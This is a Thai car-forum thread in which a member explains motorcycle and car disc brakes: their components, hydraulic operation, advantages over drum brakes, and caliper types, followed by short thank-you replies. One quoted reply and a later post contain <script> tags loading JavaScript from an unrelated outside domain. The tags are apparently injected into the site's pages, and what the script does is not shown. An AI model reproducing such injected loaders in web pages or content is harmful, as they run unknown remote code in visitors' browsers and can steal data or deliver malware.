ตอบ
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 15 ธันวา 2011 16:38 - ความรู้เกี่ยวกับ ระบบดิสเบรก
ระบบดิสเบรก
ระบบดิสเบรคจะประกอบไปด้วยชิ้นส่วนพื้นฐาน คือ จานเหล็กหล่อ(จานดิสเบรค) , ผ้าดิสเบรค , ก้ามปู และลูกสูบ จานดิสเบรคจะหมุนไปกับล้อ ไม่มีแผงหรือชิ้นส่วนใดมาปิด ทำให้สามารถระบายความร้อนได้ดี ( ที่อุณหภูมิสูงมาก ๆ ประสิทธิภาพการเบรคจะลดลง ) พร้อมทั้งช่วยให้เบรคที่เปียกน้ำ แห้งได้อย่างรวดเร็วอย่างไรก็ตาม ขนาดของจานเบรคก็มีข้อจำกัด เนื่องด้วยขนาดของขอบล้อ ทำให้ขนาดของผ้าดิสเบรคมีข้อจำกัดไปด้วย เพื่อชดเชยข้อจำกัดดังกล่าว ก็จะต้องป้อนแรงดันน้ำมันเบรคให้มากขึ้น ผ้าดิสเบรคจะสึกเร็วกว่าผ้าเบรคของเบรคครัม ในขณะที่ดิสเบรกบำรุงรักษาง่ายกว่า
เบรกแบบนี้ ใช้แรงดันน้ำมันเป็นตัวส่งถ่ายกำลังงาน เมื่อบีบคันเบรกมือลูกสูบของแม่ปั๊มเบรกจะเคลื่อนที่ไปข้างหน้า ทำให้น้ำมันเบรกเกิดแรงดันไหลไปตามท่อไปดันลูกสูบของ ชุดคาลิปเปอร์กดแผ่นผ้าเบรกซึ่งประกบอยู่ทั้งสองด้านของจานเบรก จานเบรกจะทำจากเหล็กกล้าไร้สนิม จานเบรกจะหมุนไปพร้อมกับล้อ ดังนั้นเมื่อจานเบรกถูกบีบ ล้อก็จะมีความเร็วลดลงหรือหยุดได้ตามความต้องการ
ข้อดีของดิสก์เบรกเมื่อเทียบกับดรัมเบรก
1.จานเบรกเปิดไม่ปกปิด จึงระบายความร้อนได้ดีและสะอาด ดังนั้นประสิทธิภาพในเบรกจึงคงที่สม่ำเสมอเชื่อถือได้
2.ไม่มีการเสริมแรงเหมือนกับดรัมเบรกที่มีลักษณะการทำงาน ฝักเบรกนำจึงไม่มีความแตกต่างกำลังในการเบรก ระหว่างเบรกด้านขวาและด้านซ้าย ดังนั้นรถจักรยานยนต์จึงไม่มีปัญหาเกี่ยวกับการเบรกแล้ว ดึงไปด้านใดด้านหนึ่ง
3. จานเบรกจะขยายตัวเมื่อได้รับความร้อน ระยะห่างระหว่างจานเบรกกับแผ่นผ้าเบรกก็จะเปลี่ยนไปเพียงเล็กน้อยเท่านั้น ดังนั้นคันเบรกและคันเหยียบเบรก จึงยังคงทำงานได้เป็นปกติ
4.เมื่อจานเบรกเปียกน้ำก็จะถูกเหวี่ยงออกในระยะเวลาอันสั้นด้วยแรงเหวี่ยงหนีศูนย์ เนื่องจากมีข้อดีมากมายดิสก์เบรกจึงถูกเลือกใช้โดยเฉพาะอย่างยิ่งเบรกหน้า เพราะขณะทำการเบรก ภาระแทบทั้งหมดจะไปกระทำที่ด้านหน้า ดังนั้นเบรกล้อหน้าจึงมีความสำคัญจำเป็นต้องใช้ดิสก์เบรกกับล้อหน้า ทั้งปั๊มและคันเบรกจะติดตั้งอยู่บนแฮนด์ด้านขวามือ นั่นคือการทำงานโดยเบรกมือด้วยการบีบคันเร่ง เพื่อเพิ่มกำลังในการเบรก ปัจจุบันดิสก์เบรกนี้ นอกจากจะนำมาใช้กับล้อหน้าแล้ว จักรยานยนต์บางรุ่นยังนำมาใช้กับล้อหลังด้วยนั่นก็คือดิสก์เบรกทั้งล้อหน้า และล้อหลัง ตัวจานเบรกจะยึดติดกับดุมล้อหลัง ชุดคาลิปเปอร์จะมีตัวรองรับยึดอยู่ สำหรับล้อหลังเป็นเบรกเท้า ทำงานด้วยการกดคันเหยียบเบรก


แบบของดิสก์เบรกนั้นถูกแบ่งตามโครงสร้างได้เป็น 2 แบบคือ
1.แบบลูกสูบตรงกันข้าม แบบนี้มีลูกสูบ 2 ลูกอยู่ตรงกันข้าม แผ่นผ้าเบรกทั้งคู่ถูกกดด้วยลูกสูบตามลำดับ
2.แบบลูกสูบลูกเดียว แบบนี้มีลูกสูบลูกเดียว เมื่อแผ่นผ้าเบรกด้านลูกสูบถูกกดให้สัมผัสกับจานเบรก แผ่นผ้าเบรกอีกด้านหนึ่งก็จะเคลื่อนตัวมาสัมผัสกับจานเบรก ด้วยแรงปฏิกิริยา ดังนั้นจานเบรกจึงถูกบีบโดยผ้าเบรกทั้งคู่ ดิสก์เบรกแบบนี้เรียกอีกอย่างหนึ่งว่าแบบลอย

ข้อดีลดอาการเฟด(เบรกหาย) เนื่องจากอากาศสามารถถ่ายเทความร้อนได้ดีกว่าดรัมเบรก
นอกจากนี้เมื่อเบรกเปียกน้ำผ้าเบรกจะสลัดน้ำออกจากระบบได้ดี ในขณะที่ดรัมเบรกน้ำจะขัง
อยู่ภายในและใช้เวลาในการถ่ายเทค่อนข้างช้า

ข้อเสีย ไม่มีระบบ Servo action หรือ multiplying action เหมือนกับดรัมเบรก
ผู้ขับต้องออกแรงมากกว่าจึงต้องใช้ระบบเพิ่มกำลัง เพื่อเป็นการผ่อนแรงขณะเหยียบเบรก
ทำให้ระบบดิสเบรกมีราคาค่อนข้างแพงกว่าดรัมเบรก


ดิสเบรก มีทั้ง 3 ชนิดดังนี้
2.1 ดิสเบรกแบบก้ามปูยึดติดอยู่กับที่ (Fixed position disc brake)
ดิสเบรกจะมีผ้าเบรกอยู่ 2 แผ่นติดอยู่ภายในก้ามปู (คาลิปเปอร์) วางประกบกับจานเบรก
เพื่อที่จะบีบจานเบรกตัวก้ามปูนั้นเป็นเพียงที่ยึดของลูกปั้มเท่านั้น จะไม่เคลื่อนที่ขณะเบรก
ทำงาน ดิสเบรกแบบนี้มีช่องทางเดินน้ำมันเบรกอยู่ภายในตัวก้ามปู หรืออาจมีท่อเชื่อมต่อ
ระหว่างลูกปั้ม ทั้งนี้ขึ้นอยู่กับรถยนต์แต่ละชนิด
2.2 ดิสเบรกแบบก้ามปูแกว่งได้ (Swinging caliper disc brake)
พบมากในรถยนต์ทั่วไป หลักการทำงานแตกต่างจากก้ามปูยึดอยู่กับที่ เบรกแบบนี้จะมี
ลูกปั้มหนึ่งตัวคอยดันผ้าเบรกแผ่นหนึ่ง ส่วนผ้าเบรกอีกแผ่นจะติดอยู่กับตัวก้ามปูเอง
ซึ่งตัวก้ามปูนี้สามารถเคลื่อนไปมาได้ เมื่อเหยียบเบรกน้ำมันเบรกจะดันลูกปั้มออกไป
ผ้าเบรกแผ่นที่ติดอยู่กับลูกปั้มจะเข้าไปประกบกับจานเบรก ในขณะเดียวกันน้ำมันเบรก
ก็จะดันตัวก้ามปูทั้งตัวให้เคลื่อนที่สวนทางกับลูกปั้ม ผ้าเบรกตัวที่ติดกับก้ามปูก็จะเข้าประกบ
กับจานเบรกอีกด้านหนึ่งพร้อมกับผ้าเบรกแผ่นแรก
2.3 ดิสเบรกแบบเคลื่อนที่ไปมาได้ (Sliding Caliper disc brake)
หลักการแบบเดียวกับดิสเบรกแบบแผ่น แต่ใช้ลูกปั้มสองตัว ตัวแรกเป็นตัวดันผ้าเบรก
โดยตรง ส่วนอีกตัวจะดันก้ามปู ซึ่งมีผ้าเบรกติดอยู่ให้ไปในทิศทางตรงกันข้ามกับลูกปั้ม
ตัวแรก แผ่นผ้าเบรกทั้งสองจะเข้าประกบกับจานเบรกทั้งสองด้านพร้อมๆ กัน
ได้รับคำขอบคุณจาก: mr.smith  numxs  toptwo  ming  Phetcharat  es330  Champ_civicES 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 15 ธันวา 2011 16:50 - Re: ความรู้เกี่ยวกับ ระบบดิสเบรก
khem_hatyai พิมพ์ว่า:
ระบบดิสเบรก
ระบบดิสเบรคจะประกอบไปด้วยชิ้นส่วนพื้นฐาน คือ จานเหล็กหล่อ(จานดิสเบรค) , ผ้าดิสเบรค , ก้ามปู และลูกสูบ จานดิสเบรคจะหมุนไปกับล้อ ไม่มีแผงหรือชิ้นส่วนใดมาปิด ทำให้สามารถระบายความร้อนได้ดี ( ที่อุณหภูมิสูงมาก ๆ ประสิทธิภาพการเบรคจะลดลง ) พร้อมทั้งช่วยให้เบรคที่เปียกน้ำ แห้งได้อย่างรวดเร็วอย่างไรก็ตาม ขนาดของจานเบรคก็มีข้อจำกัด เนื่องด้วยขนาดของขอบล้อ ทำให้ขนาดของผ้าดิสเบรคมีข้อจำกัดไปด้วย เพื่อชดเชยข้อจำกัดดังกล่าว ก็จะต้องป้อนแรงดันน้ำมันเบรคให้มากขึ้น ผ้าดิสเบรคจะสึกเร็วกว่าผ้าเบรคของเบรคครัม ในขณะที่ดิสเบรกบำรุงรักษาง่ายกว่า
เบรกแบบนี้ ใช้แรงดันน้ำมันเป็นตัวส่งถ่ายกำลังงาน เมื่อบีบคันเบรกมือลูกสูบของแม่ปั๊มเบรกจะเคลื่อนที่ไปข้างหน้า ทำให้น้ำมันเบรกเกิดแรงดันไหลไปตามท่อไปดันลูกสูบของ ชุดคาลิปเปอร์กดแผ่นผ้าเบรกซึ่งประกบอยู่ทั้งสองด้านของจานเบรก จานเบรกจะทำจากเหล็กกล้าไร้สนิม จานเบรกจะหมุนไปพร้อมกับล้อ ดังนั้นเมื่อจานเบรกถูกบีบ ล้อก็จะมีความเร็วลดลงหรือหยุดได้ตามความต้องการ
ข้อดีของดิสก์เบรกเมื่อเทียบกับดรัมเบรก
1.จานเบรกเปิดไม่ปกปิด จึงระบายความร้อนได้ดีและสะอาด ดังนั้นประสิทธิภาพในเบรกจึงคงที่สม่ำเสมอเชื่อถือได้
2.ไม่มีการเสริมแรงเหมือนกับดรัมเบรกที่มีลักษณะการทำงาน ฝักเบรกนำจึงไม่มีความแตกต่างกำลังในการเบรก ระหว่างเบรกด้านขวาและด้านซ้าย ดังนั้นรถจักรยานยนต์จึงไม่มีปัญหาเกี่ยวกับการเบรกแล้ว ดึงไปด้านใดด้านหนึ่ง
3. จานเบรกจะขยายตัวเมื่อได้รับความร้อน ระยะห่างระหว่างจานเบรกกับแผ่นผ้าเบรกก็จะเปลี่ยนไปเพียงเล็กน้อยเท่านั้น ดังนั้นคันเบรกและคันเหยียบเบรก จึงยังคงทำงานได้เป็นปกติ
4.เมื่อจานเบรกเปียกน้ำก็จะถูกเหวี่ยงออกในระยะเวลาอันสั้นด้วยแรงเหวี่ยงหนีศูนย์ เนื่องจากมีข้อดีมากมายดิสก์เบรกจึงถูกเลือกใช้โดยเฉพาะอย่างยิ่งเบรกหน้า เพราะขณะทำการเบรก ภาระแทบทั้งหมดจะไปกระทำที่ด้านหน้า ดังนั้นเบรกล้อหน้าจึงมีความสำคัญจำเป็นต้องใช้ดิสก์เบรกกับล้อหน้า ทั้งปั๊มและคันเบรกจะติดตั้งอยู่บนแฮนด์ด้านขวามือ นั่นคือการทำงานโดยเบรกมือด้วยการบีบคันเร่ง เพื่อเพิ่มกำลังในการเบรก ปัจจุบันดิสก์เบรกนี้ นอกจากจะนำมาใช้กับล้อหน้าแล้ว จักรยานยนต์บางรุ่นยังนำมาใช้กับล้อหลังด้วยนั่นก็คือดิสก์เบรกทั้งล้อหน้า และล้อหลัง ตัวจานเบรกจะยึดติดกับดุมล้อหลัง ชุดคาลิปเปอร์จะมีตัวรองรับยึดอยู่ สำหรับล้อหลังเป็นเบรกเท้า ทำงานด้วยการกดคันเหยียบเบรก


แบบของดิสก์เบรกนั้นถูกแบ่งตามโครงสร้างได้เป็น 2 แบบคือ
1.แบบลูกสูบตรงกันข้าม แบบนี้มีลูกสูบ 2 ลูกอยู่ตรงกันข้าม แผ่นผ้าเบรกทั้งคู่ถูกกดด้วยลูกสูบตามลำดับ
2.แบบลูกสูบลูกเดียว แบบนี้มีลูกสูบลูกเดียว เมื่อแผ่นผ้าเบรกด้านลูกสูบถูกกดให้สัมผัสกับจานเบรก แผ่นผ้าเบรกอีกด้านหนึ่งก็จะเคลื่อนตัวมาสัมผัสกับจานเบรก ด้วยแรงปฏิกิริยา ดังนั้นจานเบรกจึงถูกบีบโดยผ้าเบรกทั้งคู่ ดิสก์เบรกแบบนี้เรียกอีกอย่างหนึ่งว่าแบบลอย

ข้อดีลดอาการเฟด(เบรกหาย) เนื่องจากอากาศสามารถถ่ายเทความร้อนได้ดีกว่าดรัมเบรก
นอกจากนี้เมื่อเบรกเปียกน้ำผ้าเบรกจะสลัดน้ำออกจากระบบได้ดี ในขณะที่ดรัมเบรกน้ำจะขัง
อยู่ภายในและใช้เวลาในการถ่ายเทค่อนข้างช้า

ข้อเสีย ไม่มีระบบ Servo action หรือ multiplying action เหมือนกับดรัมเบรก
ผู้ขับต้องออกแรงมากกว่าจึงต้องใช้ระบบเพิ่มกำลัง เพื่อเป็นการผ่อนแรงขณะเหยียบเบรก
ทำให้ระบบดิสเบรกมีราคาค่อนข้างแพงกว่าดรัมเบรก


ดิสเบรก มีทั้ง 3 ชนิดดังนี้
2.1 ดิสเบรกแบบก้ามปูยึดติดอยู่กับที่ (Fixed position disc brake)
ดิสเบรกจะมีผ้าเบรกอยู่ 2 แผ่นติดอยู่ภายในก้ามปู (คาลิปเปอร์) วางประกบกับจานเบรก
เพื่อที่จะบีบจานเบรกตัวก้ามปูนั้นเป็นเพียงที่ยึดของลูกปั้มเท่านั้น จะไม่เคลื่อนที่ขณะเบรก
ทำงาน ดิสเบรกแบบนี้มีช่องทางเดินน้ำมันเบรกอยู่ภายในตัวก้ามปู หรืออาจมีท่อเชื่อมต่อ
ระหว่างลูกปั้ม ทั้งนี้ขึ้นอยู่กับรถยนต์แต่ละชนิด
2.2 ดิสเบรกแบบก้ามปูแกว่งได้ (Swinging caliper disc brake)
พบมากในรถยนต์ทั่วไป หลักการทำงานแตกต่างจากก้ามปูยึดอยู่กับที่ เบรกแบบนี้จะมี
ลูกปั้มหนึ่งตัวคอยดันผ้าเบรกแผ่นหนึ่ง ส่วนผ้าเบรกอีกแผ่นจะติดอยู่กับตัวก้ามปูเอง
ซึ่งตัวก้ามปูนี้สามารถเคลื่อนไปมาได้ เมื่อเหยียบเบรกน้ำมันเบรกจะดันลูกปั้มออกไป
ผ้าเบรกแผ่นที่ติดอยู่กับลูกปั้มจะเข้าไปประกบกับจานเบรก ในขณะเดียวกันน้ำมันเบรก
ก็จะดันตัวก้ามปูทั้งตัวให้เคลื่อนที่สวนทางกับลูกปั้ม ผ้าเบรกตัวที่ติดกับก้ามปูก็จะเข้าประกบ
กับจานเบรกอีกด้านหนึ่งพร้อมกับผ้าเบรกแผ่นแรก
2.3 ดิสเบรกแบบเคลื่อนที่ไปมาได้ (Sliding Caliper disc brake)
หลักการแบบเดียวกับดิสเบรกแบบแผ่น แต่ใช้ลูกปั้มสองตัว ตัวแรกเป็นตัวดันผ้าเบรก
โดยตรง ส่วนอีกตัวจะดันก้ามปู ซึ่งมีผ้าเบรกติดอยู่ให้ไปในทิศทางตรงกันข้ามกับลูกปั้ม
ตัวแรก แผ่นผ้าเบรกทั้งสองจะเข้าประกบกับจานเบรกทั้งสองด้านพร้อมๆ กัน
นี่มันกระทู้ปักหมุดอีกแล้วนิ ได้ความรู้อย่างแรงนิ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai  puyzaaaaa 
toptwo


ชื่อเล่น: ท็อป

เข้าร่วม: 25 มิถุนา 2011
ตอบ: 1000

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1279
ให้คำขอบคุณ: 1707

ที่อยู่: Samrong & Kanchanaburi
ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 16 ธันวา 2011 21:25 - ความรู้เกี่ยวกับ ระบบดิสเบรก
ขอบคุณสำหรับความรู้ดีๆครับ
ได้รับคำขอบคุณจาก: khem_hatyai  onut0627 
onut0627


เข้าร่วม: 24 กันยา 2011
ตอบ: 179

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 208
ให้คำขอบคุณ: 87
อาทิตย์, 18 ธันวา 2011 09:42 - ความรู้เกี่ยวกับ ระบบดิสเบรก
ได้รับคำขอบคุณจาก: zoom  redza  khem_hatyai 
Phetcharat


ชื่อเล่น: ต้น

เข้าร่วม: 15 กุมภา 2011
ตอบ: 1908

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1429
ให้คำขอบคุณ: 9944

ที่อยู่: ปัตตานี - มหาชัย - สุราษฯ
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 19 ธันวา 2011 11:38 - ความรู้เกี่ยวกับ ระบบดิสเบรก
ได้รับคำขอบคุณจาก: khem_hatyai 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
จันทร์, 19 ธันวา 2011 15:17 - ความรู้เกี่ยวกับ ระบบดิสเบรก
สวด ยอด...
ได้รับคำขอบคุณจาก: khem_hatyai 
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ธันวา 2011 21:00 - ความรู้เกี่ยวกับ ระบบดิสเบรก
ที่หามาเพราะอยากใส่ดิสหลังอะ.......... "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: es330 
Champ_civicES


ชื่อเล่น: แชมป์

เข้าร่วม: 16 พฤศจิกา 2010
ตอบ: 982

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1676
ให้คำขอบคุณ: 4291

ที่อยู่: จรัญ13
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ธันวา 2011 21:35 - ความรู้เกี่ยวกับ ระบบดิสเบรก
มาเก็บความรู้ครับผม
ได้รับคำขอบคุณจาก: khem_hatyai 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.